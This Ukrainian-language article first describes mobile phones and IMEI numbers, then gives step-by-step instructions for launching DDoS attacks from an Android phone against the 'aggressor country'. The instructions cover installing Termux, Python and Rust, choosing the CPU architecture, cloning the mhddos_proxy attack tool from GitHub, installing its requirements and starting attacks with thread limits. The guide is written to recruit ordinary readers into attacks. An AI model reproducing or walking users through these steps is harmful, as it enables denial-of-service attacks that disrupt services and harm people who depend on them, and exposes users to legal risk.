Мобільний телефон, — автономний мобільний телефон, призначений для роботи в мережах мобільного зв’язку; використовує приймач радіодіапазону та традиційну телефонну комутацію для здійснення телефонного зв’язку на території зони покриття мережі. Нині стільниковий зв’язок — найпоширеніший з усіх видів мобільного зв’язку, тому зазвичай «мобільним телефоном» називають саме стільниковий телефон, хоча мобільними телефонами крім стільникових є також спутникові телефони, радіотелефони та апарати магістрального зв’язку. Мобільний телефон — високотехнологічний електронний пристрій, що містить у собі: приймач на піддіапазоні 1-2 ГГц (GSM) та 2-4 ГГц (UMTS) НВЧ-діапазону, спеціалізований контролер управління, кольоровий/монохромний дисплей, інтерфейсні пристрої, аккумулятор. Більшість пристроїв мають свій унікальний номер, т. зв. IMEI – міжнародний ідентифікатор мобільного пристрою.
IMEI присвоюється при виробництві мобільного телефону і складається з 15 цифр; він записується в немодифікованій частині прошивки телефону (*#*#089*#*#). Сам цей номер віддруковано на етикетці телефону під аккумулятором або на чеку, а також на обгортці (упаковці) від телефону (під штрих-кодом). Сьогодні телефон у нашому житті – це не рідкість і не розкіш. Це не тому, що всі люди стали безмежно багаті і можуть дозволити собі все, а тому, що з’явилася величезна доступність аналогів для людини з різними бажаннями та можливостями. Якихось п’ятнадцять років тому було складно уявити, що навіть маленькі діти ходитимуть із трубкою в кишені і його батьки зможуть з ним зв’язатися будь-якої миті. На людину, яка б сказала, що в його кишені буде невеликий сенсорний коробочок без кнопок в якому буде все: від звичайних дзвінків до телевізора, то на нього подивилися б як на божевільного. Мобільний телефон у житті є незамінним помічником. У нашу непросту ситуацію телефон стає помічником №1, тому що завдяки йому ми можемо запобігати розвитку країни-агресора, так вам не почулося у вас є можливість влаштовувати Ddos-атаки з телефону. Ви запитаєте, як? А, я вам відповім, нічого складного в цьому немає, а поетапна інструкція допоможе вам з цим розібратися.
Переходите за посиланням та обираєте:
termux-app_v0.118.0+github-debug_universal.apk й скачуєте. (Посилання)
1. apt update && apt upgrade -y(у процесі виконання команди вам потрібно буде пару разів прописати Y, щоб підвердити оновлення, тому слідкуйте уважно)
2. pkg install python -y && pkg install rust -y && pkg install git -y
3. pip install –upgrade pip
4. cd ~
5. Тут специфічно в залежності від архітектури процесора. Але виставив вам скажемо так пріоритет, якщо ви не знаєте яка у вас архітектура то пробуйте встановлювати цю зміну перебираючи мій пріоритет до поки встановлення не буде успішним.
export CARGO_BUILD_TARGET=i686-linux-android
export CARGO_BUILD_TARGET=x86_64-linux-android
export CARGO_BUILD_TARGET=aarch64-linux-android
export CARGO_BUILD_TARGET=arm-linux-androideabi
export CARGO_BUILD_TARGET=armv7-linux-androideabi
export CARGO_BUILD_TARGET=thumbv7neon-linux-androideabi
6. export CARGO_BUILD_TARGET={архітектура процесора}
У одного адміна виглядає так:
export CARGO_BUILD_TARGET=aarch64-linux-android
У іншого так:
export CARGO_BUILD_TARGET=x86_64-linux-android
!! Якщо ви оберете не ту архітектуру то на пінкті 13 БУДЕ ПОМИЛКА ПРИ ЗАПУСКУ АТАКИ – РІШЕННЯ: ДАЛІ ПЕРЕБИРАТИ АРХІТЕКТУРИ (починаючи з пункту 4)!!
7. termux-setup-storage
8. pkg install git -y
9. cd ~/storage/shared
10. rm -rf mhddos_proxy
Може видати таке, але це норм. Або просто нічого не видасть – йдіть далі.
11. git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
12. cd mhddos_proxy
13. pip install -r termux_requirements.txt
14. Запустити атаку:
Для DDoS-у з Android -t не повинно перевищувати 1500, а –rpc не більше 1000
Готово тепер після повного закриття Термукса щоб почати нову атаку треба перейти до пункту 2 “Запуск команд”(він маленький).
Надалі після успішного встановлення вам потрібно буде робити лише наступні команди:
1. Відкрити Termux через іконку на головному екрані.
2. Зайти в папку з mhddos_proxy – потрібно ввести:
3. Оновити скрипт:
4. Завантажити нові залежності:
5. Запустити атаку: